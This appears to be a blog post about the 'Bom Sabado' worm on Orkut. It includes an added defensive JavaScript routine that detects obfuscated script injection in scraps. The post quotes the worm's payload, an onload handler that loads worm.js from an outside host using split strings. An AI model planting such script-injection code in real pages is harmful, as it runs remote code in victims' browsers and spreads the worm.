Bom Sabado! Orkut hacked!!

Damn, this is crazy.
Soon, my mailbox will be a spam box.
I keep getting this scrap “Bom Sabado” from every friend on Orkut.

Out of curiosity, I checked it out. It appears to be text. But then, things are not always what they seem…

It turned out to be an iframe attack. Here is what it looks like:

onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'##';

Needless to say, it executes a JavaScript from I think the script is pulled off from the server. HostGator, the service provider, has just suspended the website.
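The fragment above can be triaged statically to see why the scrap is more than text. This is an added example, not code from the original post: it finds inline event-handler attributes, folds the split string literals back together, and reports where the injected script points. The function names are hypothetical, and the sample input is the truncated fragment quoted above.

```javascript
// Added example: static triage of user-submitted markup such as a scrap body.
// Function names are hypothetical. SAMPLE is the fragment quoted in the post,
// kept truncated exactly as shown there.
const SAMPLE =
  `onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'##';`;

// Merge adjacent string literals ('x' + 'y' -> 'xy') until nothing changes.
// Splitting literals like this hides a URL from plain substring filters.
function foldConcats(js) {
  const pair = /(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3/;
  let prev;
  do {
    prev = js;
    js = js.replace(pair, (_m, q, a, _q2, b) => q + a + b + q);
  } while (js !== prev);
  return js;
}

// Collect inline event-handler attributes (on*=...). A missing closing quote
// is tolerated, since a filter has to cope with malformed markup.
function eventHandlers(html) {
  const re = /\b(on[a-z]+)\s*=\s*(?:"([^"]*)(?:"|$)|'([^']*)(?:'|$))/gi;
  return [...html.matchAll(re)].map((m) => ({
    attr: m[1].toLowerCase(),
    body: m[2] !== undefined ? m[2] : m[3],
  }));
}

// Report, per handler, whether it builds a <script> element and where the
// de-obfuscated src points. Any finding is grounds to reject or escape the input.
function analyzeScrap(html) {
  return eventHandlers(html).map(({ attr, body }) => {
    const js = foldConcats(body);
    const src = js.match(/\.src\s*=\s*(['"])((?:(?!\1).)*)\1/);
    const url = src ? src[2] : null;
    return {
      attr,
      createsScript: /createElement\(\s*(['"])script\1/i.test(js),
      scriptSrc: url,
      external: url !== null && /^(?:[a-z][a-z0-9+.-]*:)?\/\//i.test(url),
    };
  });
}

console.log(analyzeScrap(SAMPLE));
```

A filter that only searches for a literal hostname or for the word "script" next to a URL misses this payload; folding the concatenations first is what exposes the protocol-relative external source.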

There are two points to work over:

  • The scrap is an iframe attack which spams all of your friend lists.
  • You need to clear your cache and history, and change your password as well as your secret question, in order to stay safe.

More on this later. Let me find something interesting.

And yes, keep out of Orkut until Monday.

Fact: Bom Sabado roughly translates into “Good Saturday!”

